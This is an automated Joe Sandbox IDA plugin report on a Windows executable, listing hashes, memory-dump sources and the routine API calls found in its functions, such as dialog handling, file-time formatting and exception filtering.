                        • Opcode ID: 92924027ac00320e1dd0ef9b3ba8ed330fe46e71d636c874c0e1e1821bd45ee7
                        • Instruction ID: b7172d11dc317312aff0324f6b8d5e6da0ecb6698f6694d78492eded0bfe4d40
                        • Opcode Fuzzy Hash: 92924027ac00320e1dd0ef9b3ba8ed330fe46e71d636c874c0e1e1821bd45ee7
                        • Instruction Fuzzy Hash: 76A002D5559101BD750471515D87D36139DC5D5B657394979F80385081545118471135
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81521
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: ff43860047c9a4029a8a72b651b396bbba370d28ef469dbde25188314f7b18fe
                        • Instruction ID: fdbc03c0a93c7740d340a1a9062b6efb865b3a02f03674ed9cf0646b60d10a7a
                        • Opcode Fuzzy Hash: ff43860047c9a4029a8a72b651b396bbba370d28ef469dbde25188314f7b18fe
                        • Instruction Fuzzy Hash: D0A002D5559101BD750571519D47C36119DC5D4F793754539F80384081545118471139
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81521
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: c22accb35adccfe5ff481eb039154d1fa391aba7c696fafcc3fd377d1fc49ecc
                        • Instruction ID: fdbc03c0a93c7740d340a1a9062b6efb865b3a02f03674ed9cf0646b60d10a7a
                        • Opcode Fuzzy Hash: c22accb35adccfe5ff481eb039154d1fa391aba7c696fafcc3fd377d1fc49ecc
                        • Instruction Fuzzy Hash: D0A002D5559101BD750571519D47C36119DC5D4F793754539F80384081545118471139
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81521
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID:
                        • API String ID: 1269201914-0
                        • Opcode ID: e5ea2428b9e912d4eca7f62cf9466cbac33f6cdf8e49bbc66b49881d0711779c
                        • Instruction ID: fdbc03c0a93c7740d340a1a9062b6efb865b3a02f03674ed9cf0646b60d10a7a
                        • Opcode Fuzzy Hash: e5ea2428b9e912d4eca7f62cf9466cbac33f6cdf8e49bbc66b49881d0711779c
                        • Instruction Fuzzy Hash: D0A002D5559101BD750571519D47C36119DC5D4F793754539F80384081545118471139
                        APIs
                        • SetEndOfFile.KERNELBASE(?,00C786BE), ref: 00C7217D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: File
                        • String ID:
                        • API String ID: 749574446-0
                        • Opcode ID: a5c46ed9781e57335d1ed77fef36839cfb621e83f3ffbc1bf89f33c72398bda5
                        • Instruction ID: 174fd48fdc24e03cd7435a0482a2f8430345814164de1edb74ada5ba1ae5dc39
                        • Opcode Fuzzy Hash: a5c46ed9781e57335d1ed77fef36839cfb621e83f3ffbc1bf89f33c72398bda5
                        • Instruction Fuzzy Hash: CAB011300B080A8A8E222B30CC08A283A20EA2230A300A2A0A003C80A0CB22C023AB80
                        APIs
                        • SetCurrentDirectoryW.KERNELBASE(?,00C7E0EE,C:\Users\user\Desktop,00000000,00CB9732,00000006), ref: 00C7DF5D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CurrentDirectory
                        • String ID:
                        • API String ID: 1611563598-0
                        • Opcode ID: 3cc54d71a0c0993130f5a152a0e18ef4926644d519d235274d74f015980cd5fd
                        • Instruction ID: 52a083cc4c955c1bad1e67501052aa641ab583a239e429865bdd11f26763d8f2
                        • Opcode Fuzzy Hash: 3cc54d71a0c0993130f5a152a0e18ef4926644d519d235274d74f015980cd5fd
                        • Instruction Fuzzy Hash: 3FA012302940064A8A010F30CC0DA1975506760702B10E6217003C10A0CB304424A600
                        APIs
                          • Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
                          • Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA
                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00C7F48C
                        • EndDialog.USER32(?,00000006), ref: 00C7F49F
                        • GetDlgItem.USER32(?,0000006C), ref: 00C7F4BB
                        • SetFocus.USER32(00000000), ref: 00C7F4C2
                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 00C7F502
                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00C7F535
                        • FindFirstFileW.KERNEL32(?,?), ref: 00C7F54B
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7F569
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7F579
                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7F596
                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7F5B4
                          • Part of subcall function 00C73FB9: LoadStringW.USER32(?,?,00000200,?), ref: 00C73FFE
                          • Part of subcall function 00C73FB9: LoadStringW.USER32(?,?,00000200,?), ref: 00C74014
                        • _swprintf.LIBCMT ref: 00C7F5E4
                          • Part of subcall function 00C736D0: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C736E3
                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00C7F5F7
                        • FindClose.KERNEL32(00000000), ref: 00C7F5FA
                        • _swprintf.LIBCMT ref: 00C7F655
                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 00C7F668
                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00C7F67E
                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00C7F69E
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7F6AE
                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7F6C8
                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7F6E0
                        • _swprintf.LIBCMT ref: 00C7F711
                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00C7F724
                        • _swprintf.LIBCMT ref: 00C7F774
                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 00C7F787
                          • Part of subcall function 00C7E1A3: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7E1C9
                          • Part of subcall function 00C7E1A3: GetNumberFormatW.KERNEL32(00000400,00000000,?,00C9F044,?,?), ref: 00C7E218
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                        • API String ID: 3227067027-1840816070
                        • Opcode ID: 81714a02d2f2af1978c299c1030adbccb2b33887b428f34efc14b2612a440402
                        • Instruction ID: ab6eacdc69e709e22bd95a1b86cbf0ceec08940a2ca470109d672809265cc191
                        • Opcode Fuzzy Hash: 81714a02d2f2af1978c299c1030adbccb2b33887b428f34efc14b2612a440402
                        • Instruction Fuzzy Hash: B2919372248348BBE621DBA0DC89FFF77ECEB49704F04882EF649D6081D675A6059762
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 713c36ed90bbef6c4bcc74d52d4a15bd82ada25414861e54520432d55bf8e7ab
                        • Instruction ID: 694f64c569d17d7276155bd680e2678956269faa92034c93025a72c26ce9c636
                        • Opcode Fuzzy Hash: 713c36ed90bbef6c4bcc74d52d4a15bd82ada25414861e54520432d55bf8e7ab
                        • Instruction Fuzzy Hash: 79C24A71E086288FDF25DE28DD447EAB3B5EB45309F2441EAD85DE7240E774AE828F44
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C8AA4F
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C8AA59
                        • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00C8AA66
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 317333cbe3c5e5ec8c7649827bbbbed74120cb0eac8d92474c08973736d6b613
                        • Instruction ID: f4941e4b1f120a33ecf690d3c632cd08688ae61317998028d308e14bf8fd9b19
                        • Opcode Fuzzy Hash: 317333cbe3c5e5ec8c7649827bbbbed74120cb0eac8d92474c08973736d6b613
                        • Instruction Fuzzy Hash: AA31D6749012289BCB21EF64D9897DDBBB8AF08310F5041DAE41CA7251EB709F859F59
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID: .
                        • API String ID: 0-248832578
                        • Opcode ID: 96317c8c0e7f5aebd19519e274af0133e666bc8a5766e037e182c46a032eeb4f
                        • Instruction ID: a150cbfeb73cdf7f9c8f74785c3d389ed401d2472c468b71c564c919e89ca4d0
                        • Opcode Fuzzy Hash: 96317c8c0e7f5aebd19519e274af0133e666bc8a5766e037e182c46a032eeb4f
                        • Instruction Fuzzy Hash: B5312671900209AFCB24AE78DCC5EFA7BBDDB85318F1401ADF828D7251E6309E458B64
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd316f42ad27c60552b3d895631bf66d45d4f378006048057a551e9d46a1f216
                        • Instruction ID: 94844f2b3528ee99abf60838e009d537aa19775a6b33d600f79cc7b7e1297d34
                        • Opcode Fuzzy Hash: dd316f42ad27c60552b3d895631bf66d45d4f378006048057a551e9d46a1f216
                        • Instruction Fuzzy Hash: 63021D71E001199FDF14DFA9C8806ADB7F1EF88314F25816AD929E7345D731AE42CB94
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7E1C9
                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,00C9F044,?,?), ref: 00C7E218
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: FormatInfoLocaleNumber
                        • String ID:
                        • API String ID: 2169056816-0
                        • Opcode ID: dbb73f92e1c67cd092a1609e7697938970d7f5b5d3225c1b9f150b286c44e789
                        • Instruction ID: 56e8702504e3c27cb95b80058a9d706239813af7030e2c5de333a83097b8b82a
                        • Opcode Fuzzy Hash: dbb73f92e1c67cd092a1609e7697938970d7f5b5d3225c1b9f150b286c44e789
                        • Instruction Fuzzy Hash: 6C017175500248ABDB10CFA5DC09F9E77BCEF09710F105026FA08D7151D3709915C7A5
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C9374F,?,?,00000008,?,?,00C933EF,00000000), ref: 00C93981
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: 690f3b8299bc86e51b5c70a84e87bf29f20df3ccfce8b5e324ac7668c148c7b9
                        • Instruction ID: e2cbf07e0f54a695aec500eb2ae33aae35b9902383a20464836ab89ed7e3584f
                        • Opcode Fuzzy Hash: 690f3b8299bc86e51b5c70a84e87bf29f20df3ccfce8b5e324ac7668c148c7b9
                        • Instruction Fuzzy Hash: B4B16A716106489FDB15CF28C48AB647BE0FF05364F298659E8AACF2E1C735EA81CB44
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: 69d249e487dac91c1f654f6aaedb1587c08a9166b9302af1e3242a3c8d750b50
                        • Instruction ID: 4acf91bba31f7f904a3a39cc1ff77bc542b1a6ba2d447dc3731617f14e792a79
                        • Opcode Fuzzy Hash: 69d249e487dac91c1f654f6aaedb1587c08a9166b9302af1e3242a3c8d750b50
                        • Instruction Fuzzy Hash: A8F1BE71808756CBC714DF25CC8472EB7A2BBC4324F158B29F8AA972E0D7719E469B43
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 00C72A17
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Version
                        • String ID:
                        • API String ID: 1889659487-0
                        • Opcode ID: 24bbddd1e693aeb41ea2c948bc3f0597100a652cfbf8c42286081a1849ddf536
                        • Instruction ID: 8c78418a898920f53d0cba0633885b1009e4900b056fc5a361ffa1008a657ede
                        • Opcode Fuzzy Hash: 24bbddd1e693aeb41ea2c948bc3f0597100a652cfbf8c42286081a1849ddf536
                        • Instruction Fuzzy Hash: C0F03AB4A01208CBCB38CB19ED457ED73B5F755324F1442A9D92A93750D770AE41EE91
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_000127AF,00C82316), ref: 00C827A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 3499bb2f34be7bd10d6dc380806cf0da2307f83ea8d4b75da6084e3ccbee2d3e
                        • Instruction ID: 3c83f1716a1d385980a935b281940d25d3b63a501c07131162d71fdd4cff5273
                        • Opcode Fuzzy Hash: 3499bb2f34be7bd10d6dc380806cf0da2307f83ea8d4b75da6084e3ccbee2d3e
                        • Instruction Fuzzy Hash:
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 872a5e6246b9e36cff0fdd839a56a85fb8b659b0f65cb61eb6331a4d788444ae
                        • Instruction ID: a93373c8bdf1b5223ba5d7418fc34ffd65bbca9447fa78703a296311084bb90b
                        • Opcode Fuzzy Hash: 872a5e6246b9e36cff0fdd839a56a85fb8b659b0f65cb61eb6331a4d788444ae
                        • Instruction Fuzzy Hash: 0EA02230203200EF83008F30AFBC32C3BE8AA802C0B0C002BA802C2030EB308080BB00
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
